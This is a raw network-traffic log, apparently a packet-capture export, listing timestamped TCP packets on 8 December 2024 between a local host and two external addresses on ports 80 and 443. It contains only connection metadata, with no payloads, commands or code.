Dec 8, 2024 13:31:52.160902977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.161056995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.161735058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.161788940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.162018061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.162065029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.162445068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.162493944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.162563086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.162625074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.163352013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.163402081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.163667917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.163958073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.164200068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.164239883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.164309978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.164350033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.165024042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.165075064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.165112972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.165150881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.165910006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.165963888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.166152954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.166199923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.166771889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.166824102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.166927099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.167032003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.168056011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.168102980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.168127060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.168167114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.169229031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.169286013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.169306040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.169348001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.169703007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.169743061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.169754028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.169787884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.170849085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.170917034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.171011925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.171055079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.171756029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.171801090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.171845913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.171880960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.172255993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.172308922 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.172390938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.172504902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.172841072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.172909975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.172960043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.173543930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.173602104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.173610926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.173649073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.174423933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.174473047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.174540043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.174601078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.175257921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.175322056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.175340891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.175376892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.176089048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.176136971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.176201105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.176240921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.176964045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.177021980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.177042961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.177083015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.177862883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.177902937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.177970886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.178009033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.178666115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.178710938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.179209948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.179261923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.179563999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.179614067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.179637909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.179697037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.180355072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.180401087 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.180419922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.180464983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.181186914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.181236029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.328860998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.328927040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.328944921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.328979015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.329092979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.329125881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.329452038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.329488039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.330002069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.330022097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.330049038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.330065012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.330924988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.330976963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.331022978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.331060886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.331711054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.331763983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.331823111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.331918001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.332525015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.332570076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.332644939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.332688093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.333333969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.333376884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.333400011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.333435059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.334207058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.334261894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.334326982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.334367990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.335038900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.335091114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.335154057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.335223913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.335886002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.335941076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.335999012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.336129904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.336769104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.336822987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.336946964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.337018013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.337620974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.337665081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.337742090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.337789059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.338509083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.338561058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.338748932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.339076996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.339457035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.339505911 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.339548111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.339586020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.340178967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.340224981 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.340261936 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.340439081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.341017008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.341063976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.341109991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.341147900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.341842890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.341893911 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.341912031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.341948986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.366780996 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.367768049 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.407082081 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.422699928 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.427087069 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.427155018 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.427237034 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.572329998 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.572361946 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.576215982 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.576230049 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.633277893 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.633291006 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.633697033 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.633702040 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.634088993 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.634100914 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.813868046 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.813906908 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.813973904 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.815243006 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.815258026 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.818088055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.894622087 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.894642115 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.894697905 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.894704103 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.894774914 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.894921064 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.894937992 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.894952059 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.894958019 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.897289038 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.897324085 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.897392988 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.897543907 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.897555113 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.937338114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.948121071 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.948179007 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.948251963 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.948374033 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.948379993 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.948390007 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.948394060 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.950325012 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.950356007 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.950406075 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.950522900 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:52.950532913 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.004159927 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.004688025 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.004715919 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.005294085 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.005302906 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.269047976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.269124985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.269143105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.269196033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.269483089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.269593000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.269634008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.270278931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.270332098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.270463943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.270513058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.271169901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.271224022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.271276951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.271322966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.271986008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.272030115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.272078037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.272142887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.272829056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.272877932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.272937059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.272990942 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.273686886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.273734093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.273863077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.273910046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.274571896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.274619102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.274640083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.274683952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.275405884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.275460958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.275501013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.275660992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.276264906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.276331902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.276340008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.276388884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.277152061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.277192116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.277231932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.277281046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.277959108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.278007984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.278044939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.278109074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.278827906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.278871059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.278928041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.279053926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.279655933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.279690027 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.279700994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.279733896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.280507088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.280558109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.280630112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.280675888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.281343937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.281392097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.281471014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.281553984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.282233000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.282294989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.282340050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.283067942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.283165932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.283183098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.283231020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.283912897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.283961058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.284028053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.284070969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.284775019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.284821987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.284898043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.284940004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.286246061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.286303997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.286386013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.286426067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.286479950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.286490917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.286519051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.286529064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.287324905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.287372112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.287431002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.287483931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.288218975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.288254976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.288264036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.288292885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.289035082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.289081097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.289145947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.289273024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.289866924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.289913893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.289990902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.290030003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.290739059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.290787935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.290844917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.290915012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.291577101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.291621923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.291686058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.291729927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.292408943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.292504072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.292556047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.293270111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.293318033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.293385983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.293431044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.294109106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.294156075 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.294229031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.294270992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.294981956 CET	80	49835	185.215.113.206	192.168.2.6
